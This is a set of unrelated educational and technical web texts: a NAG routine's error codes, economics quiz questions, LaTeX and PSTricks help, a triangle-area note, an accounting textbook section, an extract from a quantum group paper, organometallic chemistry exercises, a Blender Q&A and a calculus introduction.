Constraint: ${\mathbf{M}}\ge 1$.
${\mathbf{IFAIL}}=12$
On entry, ${\mathbf{M}}=⟨\mathit{\text{value}}⟩$.
On entry at previous call, ${\mathbf{M}}=⟨\mathit{\text{value}}⟩$.
Constraint: if ${\mathbf{PN}}>0$, M must be unchanged since previous call.
${\mathbf{IFAIL}}=21$
On entry, ${\mathbf{NB}}=⟨\mathit{\text{value}}⟩$.
Constraint: ${\mathbf{NB}}\ge 0$.
${\mathbf{IFAIL}}=22$
On entry, ${\mathbf{NB}}=⟨\mathit{\text{value}}⟩$, ${\mathbf{M}}=⟨\mathit{\text{value}}⟩$.
Constraint: if ${\mathbf{LRCOMM}}=0$, ${\mathbf{NB}}\ge {\mathbf{M}}$.
${\mathbf{IFAIL}}=41$
On entry, ${\mathbf{IWT}}=⟨\mathit{\text{value}}⟩$.
Constraint: ${\mathbf{IWT}}=0$, $1$, $2$ or $3$.
${\mathbf{IFAIL}}=42$
On entry, ${\mathbf{IWT}}=⟨\mathit{\text{value}}⟩$.
On entry at previous call, ${\mathbf{IWT}}=⟨\mathit{\text{value}}⟩$.
Constraint: if ${\mathbf{PN}}>0$, IWT must be unchanged since previous call.
${\mathbf{IFAIL}}=51$
On entry, ${\mathbf{WT}}\left(⟨\mathit{\text{value}}⟩\right)=⟨\mathit{\text{value}}⟩$.
Constraint: ${\mathbf{WT}}\left(i\right)\ge 0$.
${\mathbf{IFAIL}}=52$
On entry, ${\mathbf{WT}}\left(1\right)=⟨\mathit{\text{value}}⟩$.
Constraint: if ${\mathbf{IWT}}=2$, ${\mathbf{WT}}\left(1\right)>0$.
${\mathbf{IFAIL}}=53$
On entry, at least one window had all zero weights.
${\mathbf{IFAIL}}=54$
On entry, unable to calculate at least one standard deviation due to the weights supplied.
${\mathbf{IFAIL}}=55$
On entry, sum of weights supplied in WT is $⟨\mathit{\text{value}}⟩$.
Constraint: if ${\mathbf{IWT}}=2$, the sum of the weights $>0$.
${\mathbf{IFAIL}}=61$
On entry, ${\mathbf{PN}}=⟨\mathit{\text{value}}⟩$.
Constraint: ${\mathbf{PN}}\ge 0$.
${\mathbf{IFAIL}}=62$
On entry, ${\mathbf{PN}}=⟨\mathit{\text{value}}⟩$.
On exit from previous call, ${\mathbf{PN}}=⟨\mathit{\text{value}}⟩$.
Constraint: if ${\mathbf{PN}}>0$, PN must be unchanged since previous call.
${\mathbf{IFAIL}}=91$
On entry, ${\mathbf{LRSD}}=⟨\mathit{\text{value}}⟩$.
Constraint: ${\mathbf{LRSD}}=0$ or ${\mathbf{LRSD}}\ge ⟨\mathit{\text{value}}⟩$.
${\mathbf{IFAIL}}=101$
RCOMM has been corrupted between calls.
${\mathbf{IFAIL}}=111$
On entry, ${\mathbf{LRCOMM}}=⟨\mathit{\text{value}}⟩$.
Constraint: ${\mathbf{LRCOMM}}\ge ⟨\mathit{\text{value}}⟩$. On entry, ${\mathbf{LRCOMM}}=⟨\mathit{\text{value}}⟩$.
Constraint: ${\mathbf{LRCOMM}}\ge ⟨\mathit{\text{value}}⟩$.
${\mathbf{IFAIL}}=-999$
Dynamic memory allocation failed.
## 7 Accuracy
Not applicable.
The more data that is supplied to G01WAF in one call, i.e., the larger NB is, the more efficient the routine will be. In addition, where possible, the input parameters should be chosen so that G01WAF can use the iterative formula as described in Section 3.
## 9 Example
This example calculates Spencer's $15$-point moving average for the change in rate of the Earth's rotation between $1821$ and $1850$. The data is supplied in three chunks, the first consisting of five observations, the second $10$ observations and the last $15$ observations.
### 9.1 Program Text
Program Text (g01wafe.f90)
### 9.2 Program Data
Program Data (g01wafe.d)
### 9.3 Program Results
Program Results (g01wafe.r)
This example plot shows the smoothing effect of using different length rolling windows on the mean and standard deviation. Two different window lengths, $m=5$ and $10$, are used to produce the unweighted rolling mean and standard deviations for the change in rate of the Earth's rotation between $1821$ and $1850$.
|
|
# MCQ Questions for CBSE Class 10 Economics Quiz with Answers
Students can practice the MCQ Questions for Class 10 Economics to test their conceptual knowledge and improve in weak areas accordingly. CBSE Class 10th Economics Mock Test over here will improve your overall skills in the subject.
## Multiple Choice Questions for Class 10th Economics Quiz with Answers
Practice using the Economics Grade 10 MCQ Questions Quiz by simply clicking on the conceptwise links mentioned below.
### Consumer Rights Questions and Answers
Which day is known as 'National Consumer's Day' ? 24th December
Consumer must be provided with accurate information about quality, purity, price, quantity and the standard of the goods and services. What right of a consumer is this?
Right to be informed
Which day of the following is celebrated as World Consumer Day? 15th March
"Jago Grahak Jago" is an initiative towards _______________. consumer education and awareness
When was COPRA enacted? 1986
What is the full form of BIS? Bureau of Indian Standards
The state level consumer court deals in cases involving claims between ______ to _______ . 20 lakhs, 1 crore
MRP of the product falls under the category of _____. Right to information
What is the full form of MRP? maximum retail price
Right to Information Act was enacted by the Government of India in _______. October 2005
#### Development Class 10 Economics MCQ Quiz
Different persons have different aspirations about the development because __________.
Life circumstances are different
Economic development by maintaining the natural resources for present and future use is known as ------------- Sustainable development
Economic development of a region depends on ________________________. All of the above
HDI stands for _______________. Human Development Index
Agriculture contributes nearly _________ of the GDP in India. 14%
The rise in per capita income in the Seventh Five Year Plan was _____. 3.7%
Which of the following is a low-Income country? South Africa
What is/are the major long-term objective/s of Indian planning? All of these
Which of the following is a developed country? America
Which one of the following statements appropriately describes the "fiscal stimulus"? It is an intense affirmati ve action of the Government to boost economic activity in the country
### Globalisation And The Indian Economy Questions and Answers
Globalisation And The Indian Economy Quiz Question Answer
Which of the following refers to trade barrier in the context of WTO?
II. Not allowing companies to do foreign trade beyond specific quantity.
III. Restrictions on the import and export of goods.
IV. Restrictions on the price fixed by companies.
III and IV
State whether the following statements are True or False.
Newspaper, magazines are means of mass communication.
True
The most common route for investments by MNCs in countries around the world is to ___________.
The first international earth summit was held in the year __________. 1992
What is the full form of $$NIEO$$? New International Economic Order
Liberalization means _______. removing trade barriers.
How can government of a country play a major role in making Globalization fairer? All of them
Which of the following events led to a change in the world economy? All of these
Which country has the largest share of FDI in India during the last decade? Mauritius
In India, the first plant set up by Ford Motors was in ____________. Chennai
### Money And Credit Questions and Answers
Money And Credit Quiz Question Answer
_________ costs of borrowing increase the debt-burden.
Higher
In rural areas farmers take credit for _____. Crop production
First gold coins were introduced during the reign of _____. Gupta
A 'debt trap' means _____. not able to repay credit amount
Which of the following is the main source of credit for the rich household? Formal Sector
Cheque is a _____. optional money
Since money acts as an intermediate in the exchange process, it is called _____. medium of exchange
What is the name of the success story that met the credit needs of the poor, at reasonable rates, in Bangladesh? Grameen Bank
Formal sources of credit do not include _____. employers
Modern forms of money include ________. paper notes
### Sectors Of The Indian Economy Questions and Answers
Sectors Of The Indian Economy Quiz Question Answer
This kind of Underemployment is hidden in contrast to someone who does not have a job and is clearly visible as unemployed. It is also called _______ Disguised unemployment
Employment in the service sector increased to the same extent as production.
False
In terms of GDP the share of tertiary sector in 2003 is _________.
between 50 per cent to 60 per cent
Which among the following statements is/are true about MGNREGA 2005?
All of the above
It has been noted from the histories of many, now developed, countries that at initial stages of development ____________ sector was the most important sector of economic activity.
Primary
The____________is characterized by small and scattered units which are largely outside the control of the government. Unorganised Sector
The secondary sector is also called __________ Industrial sector
Choose the odd one out from the following: Tourist Guide
___________ is the total sum of the value of the final goods and services of the Primary, Secondary and Tertiary sectors of the economy of a country produced during a year.
Gross Domestic Product
Which of the following sector contributes the most towards the GDP in India? Tertiary
### CBSE Class 10th Economics Sample Paper MCQ Questions with Answers
Free CBSE 10th Standard Economics Exam Mock Test will be of great help with all the concepts and subtopics in the subject. Identify your strengths and weaknesses by attempting the Social Science Economics Grade 10 Practice Questions and improve your scores in final exams. Get to know the Pattern of Questions that is being asked by solving the CBSE Class 10th Economics MCQ Quiz and build a stronger understanding of the subject.
### Importance of MCQExams.com Provided CBSE Class 10 Economics MCQ Quiz with Answers
Below is the information stating why you should opt the CBSE Grade 10 Social Science Economics Practice Questions given by us. They are along the lines
• With ample practice using the MCQs for Class 10th Social Science Economics you will slowly and steadily develop a deeper understanding of the concepts.
• Class 10 Economics MCQ Quiz with Answers will boost the self esteem and thus help you face the actual exams with confidence.
• You will no longer feel difficulty in finding the perfect resources for your study plan with our Chapterwise 10th Standard Economics Multiple Choice Question and Answers.
• The CBSE Grade 10 Social Science Economics Question Bank will definitely be of help to you in your journey of preparing for academic or competitive exams.
conclusion
We as a team wish the information shared regarding the MCQ Questions for Class 10th Social Science Economics has enlightened you. Please refer to the other subjects MCQs as well on our site and study to score. Stay tuned for more updates on all Preparation Related Resources such as Study Material, Revision Notes, homework Help, etc. Downloading Multiple type choice questions of all subjects for cbse classes 12, 11, 10, 9, 8, 7, 6, 5, 4, 3, 2, and 1 is very easy from MCQExams.com
|
|
# [texhax] Q: howto put image in heading?
Philip G. Ratcliffe philip.ratcliffe at uninsubria.it
Fri Feb 23 12:18:00 CET 2007
> On 22/02/07, D. R. Evans <doc.evans at gmail.com> wrote:
> > The subject pretty much says it all: I need to include a
> small image
> > in a heading. Can anyone point me to an example of how to do this?
\documentclass{article}
\usepackage{graphicx}
\begin{document}
\section{\protect\includegraphics[height=2ex]{figurefile}}
\end{document}
Is this what you want?
Cheers, Phil
|
|
PSTricks - Graphics for T<span class="e">e</span>X and L<span class="a">a</span>T<span class="e">e</span>X
Welcome to the PSTricks web site
pst-plot -- Introduction
Main page Index Bug list Documentation Doc errors Examples 2D Gallery 3D Gallery Packages References CTAN Search CTAN: Germany Ireland United Kingdom USA Statistics Extended translation of the the 5th edition the 7th edition, total of 960 colored pages 2nd edition, 212 pages, includes 32 color pages
You can download the complete LaTeX example file or the PDF. This page is a general introduction.
In LaTeX preamble write:
\usepackage{pst-plot}
It is possible to put all of them in one ore more floats.
Some exponential functions
The code for this is:
\psset{unit=1cm}
\begin{pspicture}(-4,-0.5)(4,8)
\psgrid[subgriddiv=0,griddots=5,gridlabels=7pt](-4,-0.5)(4,8)
\psline[linewidth=1pt]{->}(-4,0)(+4,0)
\psline[linewidth=1pt]{->}(0,-0.5)(0,8)
\psplot[plotstyle=curve,linewidth=1.5pt]{-4}{0.9}{10 x exp}% postscript function
\rput[l](1,7.5){$10^x$}
\psplot[plotstyle=curve,linewidth=1.5pt]{-4}{3}{2 x exp}% postscript function
\rput[l](2.2,7.5){$e^x$}
\psplot[plotstyle=curve,linewidth=1.5pt]{-4}{2.05}{2.7183 x exp}% postscript function
\rput[l](3.2,7.5){$2^x$}
\end{pspicture}
The commands:
\psset{unit=1cm}
% factor for the x and y-unit
%
\begin{pspicture}(-4,-0.5)(4,8)
% defines the area which is reserved for the picture,
% it's from the lower left to the upper right corner.
% Means a x-width of 8 and a y-width of 8.5
%
\psgrid[subgriddiv=0,griddots=5,gridlabels=7pt](-4,-0.5)(4,8)
% the grid with a subgriddepth of 1 unit, 10 dots per grid
% and the labels with a size of 7pt. The grid goes from lower
% left to upper right of the complete pspicture-area.
%
\psline[linewidth=1pt]{->}(-4,0)(+4,0)
% the x-axis
%
\psline[linewidth=1pt]{->}(0,-0.5)(0,8)
% the y-axis
%
\psplot[plotstyle=curve,linewidth=1.5pt]{-4}{0.9}{10 x exp}% postscript function
% plots the funtion 10x for (-4<x<0.9) as a curve with
% a linewidth of 1.5pt.
%
\rput[l](1,7.5){$10^x$}
% puts in mathmode ($...$) the function name as text beside the curve.
%
\psplot[plotstyle=curve,linewidth=1.5pt]{-4}{3}{2 x exp}% postscript function
% plots the funtion 2x for (-4<x<3) as a curve with
% a linewidth of 1.5pt.
%
\rput[l](2.2,7.5){$e^x$}
% s.a.
%
\psplot[plotstyle=curve,linewidth=1.5pt]{-4}{2.05}{2.7183 x exp}% postscript function
% plots the funtion ex for (-4<x<2.05 as a curve
% with a linewidth of 1.5pt.
%
\rput[l](3.2,7.5){$2^x$}
% s.a.
%
\end{pspicture}
Another plot (only for information).
log-functions (invers exponential functions)
LaTeX Source Postscript has no own tan(x) function, therefore we must bild the quotient of sin(x) and cos(x) with x sin x cos div, which is: - build sin of angle x and put the value on stack - build cos of angle x and put the value on stack - build quotient (devide) of last two stack elements. Figure 1: tan (x) function in a float
local time: Tue Jan 21 17:59:12 CET 2020 ; file is: 1127.79140046296 days old
contact webmaster _at_ perce.de
|
|
×
proof for heron's formula for equilateral triangle.
we know that area of a triangle is = 1/2 x base x height now lets us take an equilateral triangle ABC with side = m units and altitude AD to base BC.let AD = n units. now in right angled triangle ABD , AB = m , BD = m/2. now by Pythagoras therom AD-square + BD-square = AB-square i.e. n/2-square + m/2 square = m- square i.e (n-square +m-square )/4 = m-square i.e n-square + m-square = 4(m-square) i.e n-square = 3(m-square) i.e n = m x root 3 now area of triangle ABC = 1/2 x base x height = 1/2 x m/2 x m x root 3 = root 3/4 x m-square.
Note by Ksg Sarma
2 years, 6 months ago
|
|
Principles of Accounting, Volume 2: Managerial Accounting
# 10.2Evaluate and Determine Whether to Accept or Reject a Special Order
Principles of Accounting, Volume 2: Managerial Accounting10.2 Evaluate and Determine Whether to Accept or Reject a Special Order
Both manufacturing and service companies often receive requests to fill special orders. These special orders are typically for goods or services at a reduced price and are usually a one-time order that, in the short-run, does not affect normal sales. When deciding whether to accept a special order, management must consider several factors:
• The capacity required to fulfill the special order
• Whether the price offered by the buyer will cover the cost of producing the products
• The role of fixed costs in the analysis
• Qualitative factors
• Whether the order will violate the Robinson-Patman Act and other fair pricing legislation
### Fundamentals of the Decision to Accept or Reject a Special Order
The starting point for making this decision is to assess the company’s normal production capacity. The normal capacity is the production level a company can achieve without adding additional production resources, such as additional equipment or labor. For example, if the company can produce 10,000 towels a month based on its current production capacity, and it is currently contracted to produce 9,000 a month, it could not take on a special one-time order for 3,000 towels without adding additional equipment or workers. Most companies do not work at maximum capacity; rather, they function at normal capacity, which is a concept related to a company’s relevant range. The relevant range is the quantitative range of units that can be produced based on the company’s current productive assets. These assets can include equipment capacity or its labor capacity. Labor capacity is typically easier to increase on a short-term basis than equipment capacity. The following example assumes that labor capacity is available, so only equipment capacity is considered in the example.
Assume that based on a company’s present equipment, it can produce 20,000 units a month. Its relevant range of production would be zero to 20,000 units a month. As long as the units of production fall within this range, it does not need additional equipment. However, if it wanted to increase production from 20,000 units to 24,000 units, it would need to buy or lease additional equipment. If production is fewer than 20,000 units, the company would have unused capacity that could be used to produce additional units for its current customers or for new clients.
If the company does not have the capacity to produce a special order, it will have to reduce production of another good or service in order to fulfill the special order or provide another means of producing the goods, such as hiring temporary workers, running an additional shift, or securing additional equipment. As you will learn, not having the capacity to fill the special order will create a different analysis than it would if there is sufficient capacity.
Next, management must determine if the price offered by the buyer will result in enough revenue to cover the differential costs of producing the items. For example, if price does not meet the variable costs of production, then accepting the special order would be an unprofitable decision.
Additionally, fixed costs may be relevant if the company is already operating at capacity, as there may be additional fixed costs, such as the need to run an extra shift, hire an additional supervisor, or buy or lease additional equipment. If the company is not operating at capacity—in other words, the company has unused capacity—then the fixed costs are irrelevant to the decision if the special order can be met with this unused capacity.
Special orders create several qualitative issues. A logical issue is the concern for how existing customers will feel if they discover a lower price was offered to the special-order customer. A special order that might be profitable could be rejected if the company determined that accepting the special order could damage relations with current customers. If the goods in the special order are modified so that they are cheaper to manufacture, current customers may prefer the modified, cheaper version of the product. Would this hurt the profitability of the company? Would it affect the reputation?
In addition to these considerations, sometimes companies will take on a special order that will not cover costs based on qualitative assessments. For example, the business requesting the special order might be a potential client with whom the manufacturer has been trying to establish a business relationship and the producer is willing to take a one-time loss. However, our coverage of special orders concentrates on decisions based on quantitative factors.
Companies considering special orders must also be aware of the anti–price discrimination rules established in the Robinson-Patman Act. The Robinson-Patman Act is a federal law that was passed in 1936. Its primary intent is to prevent some forms of price discrimination in sales transactions between smaller and larger businesses.
### Sample Data
Franco, Inc., produces dental office examination chairs. Franco has the capacity to produce 5,000 chairs per year and currently is producing 4,000. Each chair retails for $2,800, and the costs to produce a single chair consist of direct materials of$750, direct labor of $600, and variable overhead of$300. Fixed overhead costs of $1,350,000 are met by selling the first 3,000 chairs. Franco has received a special order from Ghanem, Inc., to buy 800 chairs for$1,800. Should Franco accept the special order?
### Calculations Using Sample Data
Franco is not operating at capacity and the special order does not take them over capacity. Additionally, all the fixed costs have already been met. Therefore, when evaluating the special order, Franco must determine if the special offer price will meet and exceed the costs to produce the chairs. Figure 10.2 details the analysis.
Figure 10.2 Special Order: Supplier Has Excess Capacity. (attribution: Copyright Rice University, OpenStax, under CC BY-NC-SA 4.0 license)
Since Franco has already met his fixed costs with current production and since he has the capacity to produce the additional 800 units, Franco only needs to consider his variable costs for this order. Franco’s variable cost to produce one chair is $1,650. Ghanem is offering to buy the chairs for$1,800 apiece. By accepting the special order, Franco would meet his variable costs and make $150 per chair. Considering only quantitative factors, Franco should accept the special offer. How would Franco’s decision change if the factory was already producing at capacity at the time of the special offer? In other words, assume the corporation is already producing the most it can produce without working more hours or adding more equipment. Accepting the order would likely mean that Franco would incur additional fixed costs. Assume that, to fill the order from Ghanem, Franco would have to run an extra shift, and this would require him to hire a temporary production manager at a cost of$90,000. Assume no other fixed costs would be incurred. Also assume Franco will incur additional costs related to maintenance and utilities for this extra shift and estimates those costs will be $70,000. As shown in Figure 10.3, in this scenario, Franco would have to charge Ghanem at least$1,850 in order to meet his cost.
Figure 10.3 Special Order: Supplier Does Not Have Excess Capacity. (attribution: Copyright Rice University, OpenStax, under CC BY-NC-SA 4.0 license)
### Final Analysis of the Decision
The analysis of Franco’s options did not consider any qualitative factors, such as the impact on morale if the company is already at capacity and opts to implement overtime or hire temporary workers to fill the special order. The analysis also does not consider the effect on regular customers if management elects to meet the special order by not fulfilling some of the regular orders. Another consideration is the impact on existing customers if the price offered for the special order is lower than the regular price. These effects may create a bad dynamic between the company and its customers, or they may cause customers to seek products from competitors. As in the example, Franco would need to consider the impact of displacing other customers and the risk of losing business from regular customers, such as dental supply companies, if he is unable to meet their orders. The next step is to do an overall cost/benefit analysis in which Franco would consider not only the quantitative but the qualitative factors before making his final decision on whether or not to accept the special order.
### Think It Through
#### Athletic Jersey Special Orders
Jake’s Jerseys has been asked to produce athletic jerseys for a local school district. The special order is for 1,000 jerseys of varying sizes, and the price offered by the school district is $10 less per jersey than the normal$50 market price. The school district interested in the jerseys is one of the largest in the area. What quantitative and qualitative factors should Jake consider in making the decision to accept or reject the special order?
|
|
Quantum automorphism groups
# On the structure of quantum automorphism groups
Christian Voigt School of Mathematics and Statistics
University of Glasgow
15 University Gardens
Glasgow G12 8QW
United Kingdom
###### Abstract.
We compute the -theory of quantum automorphism groups of finite dimensional -algebras in the sense of Wang. The results show in particular that the -algebras of functions on the quantum permutation groups are pairwise non-isomorphic for different values of .
Along the way we discuss some general facts regarding torsion in discrete quantum groups. In fact, the duals of quantum automorphism groups are the most basic examples of discrete quantum groups exhibiting genuine quantum torsion phenomena.
###### 2000 Mathematics Subject Classification:
19D55, 81R50
This work was supported by the Engineering and Physical Sciences Research Council Grant EP/L013916/1.
## 1. Introduction
Quantum automorphism groups were introduced by Wang [Wangqsymmetry] in his study of noncommutative symmetries of finite dimensional -algebras. These quantum groups are quite different from -deformations of compact Lie groups, and interestingly, they appear naturally in a variety of contexts, including combinatorics and free probability, see for instance [BBCsurvey], [BCSdefinetti]. The -algebraic properties of quantum automorphism groups were studied by Brannan [Brannanquantumautomorphism], revealing various similarities with free group -algebras.
An interesting subclass of quantum automorphism groups is provided by quantum permutation groups. Following [BSliberation], we will write for the quantum permutation group on letters. According to the definition of Wang, the quantum group is the universal compact quantum group acting on the abelian -algebra . If one replaces by a general finite dimensional -algebra, one has to add the data of a state and restrict to state-preserving actions in the definition of quantum automorphism groups. Indeed, the choice of state is important in various respects. This is illustrated, for instance, by the work of De Rijdt and Vander Vennet on monoidal equivalences among quantum automorphism groups [dRV].
The aim of the present paper is to compute the -theory of quantum automorphism groups. Our general strategy follows the ideas in [Voigtbcfo], which in turn build on methods from the Baum-Connes conjecture, formulated in the language of category theory following Meyer and Nest [MNtriangulated]. In fact, the main result of [Voigtbcfo] implies rather easily that the appropriately defined assembly map for duals of quantum automorphism groups is an isomorphism. The main additional ingredient, discussed further below, is the construction of suitable resolutions, entering the left hand side of the assembly map in the framework of [MNtriangulated].
The reason why this is more tricky than in [Voigtbcfo] is that quantum automorphism groups have torsion. At first sight, the presence of torsion may appear surprising because these quantum groups behave like free groups in many respects. Indeed, the way in which torsion enters the picture is different from what happens for classical discrete groups. Therefore quantum automorphism groups provide an interesting class of examples also from a conceptual point of view. Indeed, a better understanding of quantum torsion seems crucial in order to go beyond the class of quantum groups studied in the spirit of the Baum-Connes conjecture so far [MNcompact], [Voigtbcfo], [VVfreeu]. We have therefore included some basic considerations on torsion in discrete quantum groups in this paper.
From our computations discussed below one can actually see rather directly the effect of torsion on the level of -theory. In particular, the -groups of monoidally equivalent quantum automorphism groups can differ quite significantly due to minor differences in their torsion structure. Our results also have some direct operator algebraic consequences, most notably, they imply that the reduced -algebras of functions on quantum permutation groups can be distinguished by -theory.
Let us now explain how the paper is organised. In section 2 we collect some definitions and facts from the theory of compact quantum groups and fix our notation. Section 3 contains more specific preliminaries on quantum automorphism groups and their actions. In section LABEL:sectorsion we collect some basic definitions and facts regarding torsion in discrete quantum groups. In the quantum case, this is studied most efficiently in terms of ergodic actions of the dual compact quantum groups, and our setup generalises naturally previous considerations by Meyer and Nest [MNcompact], [Meyerhomalg2]. Finally, section LABEL:seckqaut contains our main results.
Let us conclude with some remarks on notation. We write for the algebra of adjointable operators on a Hilbert module . Moreover denotes the algebra of compact operators. The closed linear span of a subset of a Banach space is denoted by . Depending on the context, the symbol denotes either the tensor product of Hilbert spaces, the spatial tensor product of -algebras, or the exterior tensor product of Hilbert modules.
## 2. Compact quantum groups
In this preliminary section we collect some definitions from the theory of compact quantum groups and fix our notation. We will mainly follow the conventions in [Voigtbcfo] as far as general quantum group theory is concerned.
###### Definition 2.1.
A compact quantum group is given by a unital Hopf -algebra , that is, a unital -algebra together with a unital -homomorphism , called comultiplication, such that
(Δ⊗id)Δ=(id⊗Δ)Δ
and
[(C(G)⊗1)Δ(C(G))]=C(G)⊗C(G)=[(1⊗C(G))Δ(C(G))].
For every compact quantum group there exists a Haar state, namely a state satisfying the invariance conditions for all . The image of in the GNS-representation of is denoted , and called the reduced -algebra of functions on . We will write for the GNS-Hilbert space of , and notice that the GNS-representation of on is faithful.
A unitary representation of on a Hilbert space is a unitary element such that . In analogy with the classical theory for compact groups, every unitary representation of a compact quantum group is completely reducible, and irreducible representations are finite dimensional. We write for the set of equivalence classes of irreducible unitary representations of . The linear span of matrix coefficients of all unitary representations of forms a dense Hopf -algebra of .
The full -algebra of functions on is the universal -completion of . It admits a comultiplication as well, satisfying the density conditions in definition 2.1. The quantum group can be equivalently described in terms of or , or in fact, using . One says that is coamenable if the canonical quotient map is an isomorphism. In this case we will simply write again for this -algebra. By slight abuse of notation, we will also write if a statement holds for both and .
The regular representation of is the representation of on corresponding to the multiplicative unitary determined by
W∗(Λ(f)⊗Λ(g))=(Λ⊗Λ)(Δ(g)(f⊗1)),
where is the image of under the GNS-map. The comultiplication of can be recovered from by the formula
Δ(f)=W∗(1⊗f)W.
One defines the algebra of functions on the dual discrete quantum group by
C0(^G)=[(L(L2(G))∗⊗id)(W)],
together with the comultiplication
^Δ(x)=^W∗(1⊗x)^W
for , where . We remark that there is no need to distinguish between and in the discrete case.
Since we are following the conventions of Kustermans and Vaes [KVLCQG], there is a flip map built into the above definition of , so that the comultiplication of corresponds to the opposite multiplication of . This is a natural choice in various contexts, but it is slightly inconvenient when it comes to Takesaki-Takai duality. We will write for , that is, for the Hopf -algebra equipped with the opposite comultiplication , where denotes the flip map. By slight abuse of terminology, we shall refer to both and as the dual quantum group of , but in the sequel we will always work with instead of . According to Pontrjagin duality, the double dual of in either of the two conventions is canonically isomorphic to .
An action of a compact quantum group on a -algebra is a coaction of on , that is, an injective nondegenerate -homomorphism such that and . In a similar way one defines actions of discrete quantum groups, or in fact arbitrary locally compact quantum groups. We will call a -algebra equipped with a coaction of a --algebra. Moreover we write - for the category of all --algebras and equivariant -homomorphisms.
The reduced crossed product of a --algebra is the -algebra
G⋉rA=[(C0(ˇG)⊗1)α(A)]
The crossed product is equipped with a canonical dual action of , which turns it into a --algebra. Moreover, one has the following analogue of the Takesaki-Takai duality theorem [BSUM].
###### Theorem 2.2.
Let be a regular locally compact quantum group and let be a --algebra. Then there is a natural isomorphism
ˇG⋉rG⋉rA≅K(L2(G)))⊗A
of --algebras.
We will use Takesaki-Takai duality only for discrete and compact quantum groups, and in this setting regularity is automatic. At some points we will also use the full crossed product of a --algebra , and we refer to [NVpoincare] for a review of its definition in terms of its universal property for covariant representations.
## 3. Quantum automorphism groups
In this section we review some basic definitions and results on quantum automorphism groups of finite dimensional -algebras and fix our notation. We refer to [Wangqsymmetry], [Banicageneric], [Banicafusscatalan] for more background on quantum automorphism groups.
Let us start with the definition of the quantum automorphism group of a finite dimensional -algebra , compare [Wangqsymmetry] [Banicageneric]. If denotes the multiplication map then a faithful state on is called a -form for if with respect to the Hilbert space structures on and implemented by the GNS-constructions for and , respectively.
###### Definition 3.1.
Let be a finite dimensional -algebra and let be a -form on for some . The quantum automorphism group is the universal compact quantum group acting on such that is preserved.
That is, if is any compact quantum group together with a coaction then there exists a unique morphism of quantum groups such that the diagram
You are adding the first comment!
How to quickly get a good reply:
• Give credit where it’s due by listing out the positive aspects of a paper before getting into which changes should be made.
• Be specific in your critique, and provide supporting evidence with appropriate references to substantiate general statements.
• Your comment should inspire ideas to flow and help the author improves the paper.
The better we are at sharing our knowledge with each other, the faster we move forward.
The feedback must be of minimum 40 characters and the title a minimum of 5 characters
|
|
The polar oxidative addition mechanism is very similar to an aliphatic nucleophilic substitution (SN1 or SN2) reaction.
Figure $$\PageIndex{1}$$: An example of a polar oxidative addition.
In an oxidative addition, the metal can act as a nucleophile in the first step in an SN2 process. In the second step, the liberated halide binds to the metal. That doesn't happen in a normal nucleophilic substitution. In this case, the metal has donated its electrons and is able to accept another pair from the halide.
Figure $$\PageIndex{2}$$: Mechanistic steps in a polar oxidative addition.
Polar oxidative addition has some requirements similar to a regular SN1 or SN2 reaction:
• Requires good leaving group
• Requires tetrahedral carbon (or a proton) as electrophile
Exercise $$\PageIndex{1}$$
a) What do you think is the most difficult step (i.e. the rate-determining step) for the reaction in Figure $$\PageIndex{2}$$ (OA3.2)? Why?
b) Suggest the probable rate law for this reaction.
Probably the first step is the hardest (slowest) step, involving bond breaking in the alkyl halide. The donation of the resulting anion to the cation should be pretty fast.
$Rate = k_{1}[ML_{n}][CH_{3}Br] \nonumber$
Exercise $$\PageIndex{2}$$
The platinum compound shown below is capable of reductively eliminating a molecule of iodobenzene.
a) Show the products of this reaction.
The starting platinum compound is completely stable in benzene; no reaction occurs in that solvent. However, reductive elimination occurs quickly when the compound is dissolved in methanol instead.
b) Explain why the solvents may play a role in how easily this compound reacts.
The reaction in methanol is inhibited by added iodide salts, such as sodium iodide.
c) Provide a mechanism for the reductive elimination of iodobenzene from the platinum complex, taking into account the solvent dependence and the inhibition by iodide ion.
Methanol is more polar than benzene. The acceleration of the reaction in methanol suggests that there is increasing polarity in the transition state, or polar intermediates.
Inhibition by iodide ion suggests that iodide is a product of a reversible step during this reaction. Adding iodide pushes that step backward, decreasing the rate of product formation. The mechanism below is consistent with these observations:
Thus reductive elimination occurs as we go from the second to the third intermediate.
Presumably, the increased positive charge (and general decrease in electron density, owing to loss of a ligand) results in reductive elimination because of destabilization of the Pt(IV).
Alternatively, we might suppose that after loss of iodide, the iodide ion donates directly to a phenyl ligand, displacing the platinum as a leaving group in an SN2 reaction. That would lead directly to the product from the first intermediate, which is a simpler route. However, the precedent for aliphatic nucleophilic substitution involves nucleophilic donation to tetrahedral carbons, not to trigonal planar ones. That mechanism is unlikely.
Exercise $$\PageIndex{3}$$
For the following reaction,
a) Identify the oxidation state at platinum in the reactant and the products.
b) Assign stereochemical configuration in the product and the reactant.
c) Explain the stereochemistry of the reaction.
Pt(0) to Pt(II)
Changes from (R) to (S)
This is an SN2 reaction, so the platinum displaces the bromide from the opposite side.
Exercise $$\PageIndex{4}$$
Reaction of the following deuterium-labeled alkyl chloride with tetrakis(triphenylphosphine) palladium produces an enantiomerically pure product (equation a). Draw the expected product.
However, reaction of a very similar alkyl halide produces a compound that is only 90% enantiomerically pure. Draw the major product and explain the reason that there is some racemization
Exercise $$\PageIndex{5}$$
Frequently, oxidative additions and reductive eliminations are preceded or followed by other reactions. Draw a mechanism for the following transformation.
This page titled 5.3: Polar Oxidative Addition is shared under a CC BY-NC 3.0 license and was authored, remixed, and/or curated by Chris Schaller via source content that was edited to the style and standards of the LibreTexts platform; a detailed edit history is available upon request.
|
|
# Q: Blender 2.8 desktop shortcut doesn't work
After downloading 2.8 on Linux Mint, the blender.desktop shortcut doesn't open the application; it simply displays "There was an error launching the application". Running the executable directly works without any flaws.
• Is the path in the .desktop correct? – Robert Gützkow Aug 18 '19 at 8:06
• Yes, the executable is in the same folder and the name is correct. – devvoid Aug 19 '19 at 1:16
• Be sure the .desktop file refers to /dir/to/blender and not /dir/to/Blender – Tim Kuipers Aug 20 '19 at 9:31
• the file uses exec=blender, blender is in the exact same directory. – devvoid Aug 21 '19 at 0:20
|
|
# Monotonic Functions (Increasing and Decreasing)
Monotonic simply means either increasing or decreasing. A function is monotonic if one or the other holds. In this article, I discuss at length finding extrema of monotonic functions. An essential tool in this regard is the First Derivative Test. Finding extrema becomes much easier when you have mastered this theorem.
All relative extrema of a functions’ graph must occur at critical numbers of the function (where the derivative is undefined or zero). We discuss the first derivative test and illustrate its use with several examples. Exercises are given at the end.
## Increasing and Decreasing Functions
